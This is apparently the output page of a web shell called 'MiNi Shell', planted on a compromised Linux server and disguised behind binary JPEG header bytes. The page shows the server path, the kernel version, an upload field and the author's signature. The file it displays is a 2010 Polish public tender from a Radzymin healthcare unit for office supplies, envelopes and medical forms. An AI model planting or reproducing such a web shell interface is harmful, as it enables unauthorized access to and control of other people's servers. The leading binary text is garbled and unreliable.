JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100310/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100310/53383-N-2010.html

<p class="kh_header"><b>Radzymin: Zakup i dostawa artykułów biurowych, kopert i druków medycznych.</b><br>
<b>Numer ogłoszenia: 53383 - 2010; data zamieszczenia: 10.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej , ul. Konstytucji 3 Maja 17, 05-250 Radzymin, woj. mazowieckie, tel. 022 7865037, faks 022 7865037.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.radzymin.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa artykułów biurowych, kopert i druków medycznych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup i dostawa artykułów biurowych, kopert i druków medycznych szczegółowo określone w załączniku do SIWZ i poszczególnych czesciach zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienie uzupełniajace 20% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.92.00-2, 30.19.97.13-1, 22.80.00.00-8, 22.45.80.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzzoz-radzymin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Samodzielnym Publicznym Zespole Zakładów Opieki Zdrowotnej w Radzyminie ul. Konstytucji 3 Maja 17   05-250 Radzymin  budynek przychodni  II piętro pok.214,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2010 godzina 10:30, miejsce: w Samodzielnym Publicznym Zespole Zakładów Opieki Zdrowotnej w Radzyminie ul. Konstytucji 3 Maja 17   05-250 Radzymin  budynek przychodni  II piętro pok.214,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 17.04.2010.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Papier POL lux A4 80g/2mm	550 ryz

2	Papier POL lux A3 80g/2mm	5 ryz
3	Segregator A4 foliowany  czerwony  75 mm  z szyna met.	50 szt
4	 Segregator foliowany czarny  75 mm z szyna met.	50 szt.
5	Segregator A4 foliowany  żółty  75 mm  z szyna met.	50 szt
6	 Segregator foliowany niebieski  50 mm z szyna met.	50 szt.
7	Teczka kartonowa niebieska A4  z gumką 	100 szt
8	Długopis BIC Orange czerwony 	20 szt.
9	Długopis BIC Orange czarny	20 szt.
10	Długopis BIC Orange niebieski	20 szt.
11	Długopis Orange zielony 	10 szt.

12	Długopis Atlantis niebieski	50 szt.

13	Marker na bazie wody grubość linii 3 mm czarny	50 szt.
14	Markier lakierowy grubość linii 2 mm czarny	50 szt.
15	Marker do tablic suchoście. zestaw 4 kolory	5 szt.
16	Spinacze biurowe 50 mm	50 op.

17	Spinacze biurowe 33 mm
	100 op.
18	Koszulka krystaliczna A4 100 szt. op. 	100 op.
19	Koszulka krystaliczna szeroka A4   25 szt. op.	20 op.
20	Pineska beczułka	5 op.

21	Pineska zwykła metalowa
	10 op.
22	Ołówek z gumką 2988 / HB 	12 szt.
23	Brulion w kratkę 96 k.  A4 twarda okładka 	30 szt.
24	Brulion w kratkę 96  A5 twarda okładka 	30 szt.
25	Flamaster czarny
	20 szt.
26	Korektor w długopisie 12 ml.  Tipp-Ex	15  szt.

27	Korektor w płynie 20 ml. Tipp-Ex	30 szt

28	Zszywki 24/6 	1000 szt

29	Zszywki  23/8 	10 op.

30	Tusz do stempli uniwersalny  czarny 	10 szt.
31	Zszywacz FC 5505 Leitz na zszywki 24/6  	5 szt.
32	Dyskietki 3,5 2 HD  TDK  	5 op.

33	Płyty CD-R  SONY  CAKE 48X  ( op. 50 szt)	10 op.
34	Skoroszyt wpinany A4 okładka przednia przezro. tylna kolorowa	100 szt.
35	Teczka kartonowa kolorowa A4  z gumką 	100 szt
36	Skoroszyt kartono. A4 biały 	100 szt

37	Grzbiety do bindowania  plastk.  8 mm	1 op
38	Okładki  A4 przezroczyste do dokumentów służące jako pierwsza strona 	1 op
39	Okładki skóropodobne A4  służące jako ostatnia strona  ( granatowe)	1 op.
40	Nożyczki1 uniwersalne 
  15,5 cm 	5 szt
41	Woreczki strunowe 175 x 250 mm 	15 op.
42	Klej sztyft IMPEGA  20G	30 szt
43	Taśma TESA Transparent - Film  19 mm 	50 szt
44	Blok A5 bez okładki  w kratkę 	10 szt.
45	Notes  samoprzylepny  
51x 38 mm     3 szt w op.	25 op.
46	Notes samoprzylepny do podajnika  Post-it  76x76	10 szt
47	Podajnik Millenium model  C2014	2 szt.
48	Baterie alkaiczne ENERGIZER AAA kod BAK  001   1,5 V 	10 op.
49	Baterie alkaiczne ENERGIZER AA kod BAK 003  1,5 V  	10 op.
50	Półki na dokumenty przezroczyste	10 szt
51	Zakreślasz  fluorescencyjny STABLO BOSS  (4 kolor)	15  op.
52	Flamastry etui (4 kolory)	20 op.

53	Przekładki kartonowe 	100 szt.

54	Linijka 30 cm 	10 szt.

55	Zeszyt A5    32 kart	50 szt.

56	Płyn do czyszczenia tablic suchościeralno- magnetycznych	2  szt.
57	Klipsy do papieru Grand  19 mm 	20 op
58	Klipsy do papieru Grand  25 mm	20 op
59	Przybornik na biurko Dual walec z szufladkami symbol 1995	2 szt
60	Folia zgrzewarek A4	50 ark. 
61	Mechanizm skoroszytowy 
	4  op.
62	Grzbiety wsuwane A4 leitz  (niebieskie)  GBK 127	1 op.
63	Grzbiety do bindownicy  GBK019 (niebieskie) 	1 op
64	Temperówka z pojemnikiem 	5 szt
65	Cienkopis Stabilo Point 88 
Czerwony 40	5  szt.
66	Cienkopis Stabilo Point 88 
Zielony 36	5 szt.
67	Cienkopis Stabilo Point 88 
Ciemno niebieski 41	10 szt.
68	Cienkopis Stabilo Point 88 
Czarny 46	5 szt.
69	Papier POL lux A4 80g/2mm  mikx kolorów	5 ryz
70	Dysk DVD +R/R  16x  kod XCK 029   50 szt	1 op.
71	Gumka Rasoplast	5 szt

72	 Kredki ołówkowe   24 kolory                                                                                                                                                                             	2 op.
73	Kredki świecowe
	5 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kopert.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Koperty B4 samoklejące białe	500 szt.
2	Koperty C6 samoklejące białe	1000 szt.
3	Koperty C4 samoklejące białe	1000 szt.
4	Koperty B5 samoklejące białe	500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.92.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Koperty do zdjęć RTG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Koperty szare do zdjęć RTG 190x250 mm	600 szt.
2	Koperty szare do zdjęć RTG  250x311 mm	600 szt.
3	Koperty szare do zdjęć RTG 210x410	600 szt.
4	Koperty szare do zdjęć RTG 310x410 mm	700 szt.
5	Koperty szare do zdjęć RTG  360x360 mm	1100 szt.
6	Koperty szare do zdjęć RTG 360x410 mm	1100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.97.13-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Druki akcydensowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Faktura VAT  A5	10 bl.

2	Dowód wpłaty KP	100 bl.

3	Dowód wpłaty KW	10 bl.

4	Magazyn wyda	10 bl.

5	Magazyn przyjmie	10 bl.

6	Korekta magazynowa  A5	500 szt.

7 	Wniosek o zaliczkę	10 bl.

8	Nota korygująca VAT nota pełna A5 (kod DRK 049)	2 bl.
9	Wezwanie do zapłaty A6 DRK  155	5bl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.80.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Druki medyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Historia choroby klinika chorób wewnętrznych	1500 szt.
2	Wkładka do historii choroby	1500 szt
3	Wkładka do historii choroby układ krążenia i bad. przedm. 	1500 szt.
4	Indywidualna karta zleceń lekarskich	2000 szt.
5	Karta gor. Og. Mz/Szp 16	2000 szt.
6	Skierowanie do szpitala	500 szt

7	Skierowanie do poradni specj.	500 szt.
8	Skierowanie do poradni diagnost.	1500 szt
9	Karta statysty. Do karty zgonu	100 szt
10	Rozkład pracy dla pielęgniarek	100 szt.
11	Skierowanie do zakładu radiologicznego lekar.	2000 szt.
12	Zapotrzebowanie indywidu. na krew i środki krwiopochodne	3 bl.
13 	Karta serologiczna  bad. w kierunku kiły	600 szt.
14	Spis bielizny wydanej do pralni	5 bl.
15	Zestawienie dzienne oddziału	15 bl.
16	Karta wyniku badań 
laborato. w przyp. choroby zakaźnej	100 szt.
17	Receptariusz szpitalny	10 bl

18	Karta informacyjna Izby Przyjęć 	1500 szt.
19	Skierowanie do laboratorium	2500 szt.
20	Zlecenie na przewiezienie chorego	100 szt.
21	Książka raportów pielęgniarki	20 szt.
22	Dziennik pracy ambulatorium	20 szt.
23	Zaświadczenie o pobycie pacjenta w szpitalu	1000 szt.
24	Skierowanie do sanatorium	20 szt.
25	Skierowanie na próbę zgodności krwi	50 szt.
26	Badanie bakteriologiczne	100 szt.
27	Księga pracowni analitycznej	5 szt.
28	Książka badania laboratoryjnego	10 szt.
29
	Książka do pracowni RTG	5 szt.
30
	Książka gabinetu zabiegowego	2 szt.
31
	Pierwsze odwiedziny pielęgniarki środowiskowej	100 szt.
32	Odwiedziny pielęgniarki środowiskowej	200 szt.
33	Deklaracja wyboru lekarza	2 bl.
34	Rezygnacja z wyboru lekarza	2 bl.
35	Patronaż   lekarza pediatry	3 bl
36	Skierowanie na leczenie uzdrowiskowe	2 bl.
37	Zlecenie transportu sanitarnego 
	5 bl.
38
	Karta ciąży	100 szt.
39	Karta przebiegu ciąży i połogu
	100 szt.
40	Wkładka do karty zdrowia	200 szt.
41 	Karta zdrowia dziecka	100 szt.

42	Wkładka do karty zdrowia dziecka	100 szt.
43	Książka ewidencji noworodków	5 szt.
44	Bilans zdrowia dziecka 
2 letniego	100 szt.
45	Bilans zdrowia dziecka 
4 letniego	100 szt.
46	Karta choroby poradni stomatologicznej 	1000 szt.
47	Recepta na okulary	500 szt.

48	Księga chorego na jaskrę	10 bl.

49	Wynik badania cytologicznego	20 bl.
50	Wynik badania laboratoryjnego WR	10 bl.
51	 Lista klasowa	2 bl

52	Zaśw. o czasie niezdolności do WF	1 bl.
53	Karta zdrowia ucznia 2xA5	100 szt.
54	Karta rozwoju i zdrowia 
6 latków	2 bl.
55	Karta Bad. lek. ucznia 
kl. III szk. podstawowej  	2 bl.
56	Karta Bad. lek. ucznia 
kl. I gimnazjum i kl. I  szk. ponadgimnazjalnej	2 bl.
57	Karta Bad. lek. ucznia 
ostatniej kl. szk. Ponadgimnazjalnej 18 l.	3 bl
58	Kwalifikacja do nauki pływania	2 bl.
59	Informacja dotycząca szczepień
	2 bl.
60	Orzeczenie dotyczące kształcenia nauki zawodu	2 bl.
61	Zaświadczenie lekarskie ucznia szk. ponadpodstaw	2 bl.
62	Karta zgłoszenia do medycy. pielęgniarki szkolnej	100 szt
63	Zaświadczenie lekarskie dla kandydatów do szkół wyższych	1 bl.
64	Rezygnacja z opieki lekarza szkolnego	100 szt.
65	Rezygnacja z opieki pielęgniarki szkolnej	100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.45.80.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com